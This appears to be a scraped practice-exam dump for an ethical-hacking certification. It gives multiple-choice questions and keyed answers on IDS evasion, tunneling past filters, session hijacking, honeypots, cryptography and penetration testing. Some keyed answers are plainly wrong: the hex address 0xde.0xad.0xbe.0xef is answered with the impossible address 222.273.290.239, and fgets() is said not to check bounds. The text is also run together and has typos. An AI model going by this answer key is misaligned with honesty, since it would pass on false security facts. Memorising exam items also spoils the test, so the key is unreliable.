Neil monitors his firewall rules and log files closely on a regular basis. Some of the users havecomplained to Neil that there are a few employees who are visiting offensive web sites during workhours, without consideration for others. Neil knows that he has an updated content filtering system and that such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction?A. They are using UDP which is always authorized at the firewall.B. They are using tunneling software which allows them to communicate with protocols in a way it was not intended.C. They have been able to compromise the firewall, modify the rules, and give themselves proper access.D. They are using an older version of Internet Explorer that allows them to bypass the proxy server.
B. They are using tunneling software which allows them to communicate with protocols in a way it was not intended.
Bob, an Administrator at pass4sure was furious when he discovered that his buddy Trent, has launched a session hijack attack against his network, and sniffed on his communication, includingadministrative tasks such as configuring routers, firewalls, IDS, via Telnet. Bob, being an unhappy administrator, seeks your help to assist him in ensuring that attackers such as Trent will not be able to launch a session hijack in pass4sure. Based on the above scenario, please choose which would be your corrective measurement actions (Choose two)A. Use encrypted protocols, like those found in the OpenSSH suite.B. Implement FAT32 filesystem for faster indexing and improved performance.C. Configure the appropriate spoof rules on gateways (internal and external).D. Monitor for CRP caches, by using IDS products.
A. Use encrypted protocols, like those found in the OpenSSH suite.C. Configure the appropriate spoof rules on gateways (internal and external).
Network Intrusion Detection systems can monitor traffic in real time on networks. Which one of thefollowing techniques can be very effective at avoiding proper detection?A. Fragmentation of packets.B. Use of only TCP based protocols.C. Use of only UDP based protocols.D. Use of fragmented ICMP traffic only.
A. Fragmentation of packets
While examining a log report you find out that an intrusion has been attempted by a machinewhose IP address is displayed as 0xde.0xad.0xbe.0xef. It looks to you like a hexadecimal number.You perform a ping 0xde.0xad.0xbe.0xef. Which of the following IP addresses will respond to theping and hence will likely be responsible for the the intrusion?A. 192.10.25.9B. 10.0.3.4C. 203.20.4.5D. 222.273.290.239
D. 222.273.290.239
All the web servers in the DMZ respond to ACK scan on port 80. Why is this happening?A. They are all Windows based webserverB. They are allUnix based webserverC. The company is not using IDSD. The company is not using a stateful firewall
D. The company is not using a stateful firewall.
What is a sheepdip?A. It is another name for HoneynetB. It is a machine used to coordinate honeynetsC. It is the process of checking physical media for virus before they are used in a computerD. None of the above
C. It is the process of checking physical media for virus before they are used in a computer
If you come across a sheepdip machine at your client's site, what should you do?A. A sheepdip computer is used only for virus-checking.B. A sheepdip computer is another name for a honeypotC. A sheepdip coordinates several honeypots.D. A sheepdip computers defers a denial of service attack.
A. A sheepdip computer is used only for virus-checking.
What type of attack changes its signature and/or payload to avoid detection by antivirusprograms?A. PolymorphicB. RootkitC. Boot sectorD. File infecting
A. Polymorphic
You may be able to identify the IP addresses and machine names for the firewall, and the names of internal mail servers by:A. Sending a mail message to a valid address on the target network, and examining the header information generated by the IMAP serversB. Examining the SMTP header information generated by using the -mx command parameter of DIGC. Examining the SMTP header information generated in response to an e-mail message sent toan invalid addressD. Sending a mail message to an invalid address on the target network, and examining the header information generated by the POP servers
C. Examining the SMTP header information generated in response to an e-mail message sent toan invalid address
Which of the following is not an effective countermeasure against replay attacks?A. Digital signaturesB. Time StampsC. System identificationD. Sequence numbers
C. System identification
To scan a host downstream from a security gateway, Firewalking:A. Sends a UDP-based packet that it knows will be blocked by the firewall to determine how specifically the firewall responds to such packetsB. Uses the TTL function to send packets with a TTL value set toexpire one hop past the identified security gatewayC. Sends an ICMP ''administratively prohibited'' packet to determine if the gateway will drop the packet without comment.D. Assesses the security rules that relate to the target system before it sends packets to any hopson the route to the gateway
B. Uses the TTL function to send packets with a TTL value set to expire one hop past the identified security gateway.
Which of the following are potential attacks on cryptography? (Select 3)A. One-Time-Pad AttackB. Chosen-Ciphertext AttackC. Man-in-the-Middle AttackD. Known-Ciphertext AttackE. Replay Attack
B. Chosen Ciphertext AttackC. Man in the Middle AttackE. Replay Attack
What is a primary advantage a hacker gains by using encryption or programs such as Loki?A. It allows an easy way to gain administrator rightsB. It is effective against Windows computersC. It slows down the effective responseof an IDSD. IDS systems are unable to decrypt itE. Traffic will not be modified in transit
D. IDS systems are unable to decrypt it.
Which of the following countermeasure can specifically protect against both the MAC Flood andMAC Spoofing attacks?A. Port SecurityB. Switch MappingC. Port ReconfiguringD. Multiple Recognition
A. Port Security
There are two types of honeypots- high and low interaction. Which of these describes a lowinteraction honeypot? Select the best answers.A. Emulators of vulnerable programsB. More likely to be penetratedC. Easier to deploy and maintainD. Tend to be used for productionE. More detectableF. Tend to be used for research
A. Emulators of vulnerable programsC. Easier to deploy and maintainD. Tend to be used for productionE. More detectable
An Evil Cracker is attempting to penetrate your private network security. To do this, he must not beseen by your IDS, as it may take action to stop him. What tool might he use to bypass the IDS?Select the best answer.A. FirewalkB. ManhuntC. FragrouterD. Fragids
C. Fragrouter
The programmers on your team are analyzing the free, open source software being used to runFTP services on a server. They notice that there is an excessive number of fgets() and gets() onthe source code. These C++ functions do not check bounds. What kind of attack is this programsusceptible to?A. Buffer of OverflowB. Denial of ServiceC. Shatter AttackD. Password Attack
A. Buffer Overflow
Symmetric encryption algorithms are known to be fast but present great challenges on the keymanagement side. Asymmetric encryption algorithms are slow but allow communication with aremote host without having to transfer a key out of band or in person. If we combine the strengthof both crypto systems where we use the symmetric algorithm to encrypt the bulk of the data andthen use the asymmetric encryption system to encrypt the symmetric key, what would this type ofusage be known as?A. Symmetric systemB. Combined systemC. Hybrid systemD. Asymmetric system
C. Hybrid system
In the context of using PKI, when Sven wishes to send a secret message to Bob, he looks upBob's public key in a directory, uses it to encrypt the message before sending it off. Bob then useshis private key to decrypt the message and reads it. No one listening on can decrypt the message.Anyone can send an encrypted message to Bob but only Bob can read it. Thus, although manypeople may know Bob's public key and use it to verifyBob's signature, they cannot discover Bob's private key and use it to forge digital signatures. Whatdoes this principle refer to?A. IrreversibilityB. Non-repudiationC. SymmetryD. Asymmetry
D. Asymmetry
Which of the following is NOT true of cryptography?A. Science of protecting information by encoding it into an unreadable formatB. Method of storing and transmitting data in a form that only those it is intended for can read andprocessC. Most (if not all) algorithms can be broken by both technical and non-technical meansD. An effective way of protecting sensitive information in storage but not in transit
D. An effective way of protecting sensitive information in storage but not in transit
Which of the following best describes session key creation in SSL?A. It is created by the server after verifying theuser's identityB. It is created by the server upon connection by the clientC. It is created by the client from the server's public keyD. It is created by the client after verifying the server's identity
D. It is created by the client after verifying the server's identity
_____ is a type of symmetric-key encryption algorithm that transforms a fixed-length block ofplaintext (unencrypted text) data into a block of ciphertext (encrypted text) data of the same length.A. Bit CipherB. Hash CipherC. Block CipherD. Stream Cipher
C. Block Cipher
There is some dispute between two network administrators at your company. Your boss asks youto come and meet with the administrators to set the record straight. Which of these are true aboutPKI and encryption? Select the best answers.A. PKI provides data with encryption, compression, and restorability.B. Public-key encryption was invented in 1976 by Whitfield Diffie and Martin Hellman.C. When it comes to eCommerce, as long as you have authenticity, and authenticity, you do notneed encryption.D. RSA is a type of encryption
B. Public Key Encryption was invented in 1976 by Diffie and HellmanD. RSA is a type of encryption
Joel and her team have been going through tons of garbage, recycled paper, and other rubbish inorder to find some information about the target they are attempting to penetrate. What would youcall this kind of activity?A. CI GatheringB. ScanningC. Dumpster DivingD. Garbage Scooping
C. Dumpster Diving
A client has approached you with a penetration test requirements. They are concerned with thepossibility of external threat, and have invested considerable resources in protecting their Internetexposure. However, their main concern is the possibility of an employee elevating his/herprivileges and gaining access to information outside of their respective department. What kind ofpenetration test would you recommend that would best address the client's concern?A. A Black Box testB. A Black Hat testC. A Grey Box testD. A Grey Hat testE. A White Box testF. A White Hat test
C. A Grey Box Test

In which of the following should be performed first in any penetration test? A. System identification B. Intrusion Detection System testing C. Passive information gathering D. Firewall testing

C. Passive Information Gathering.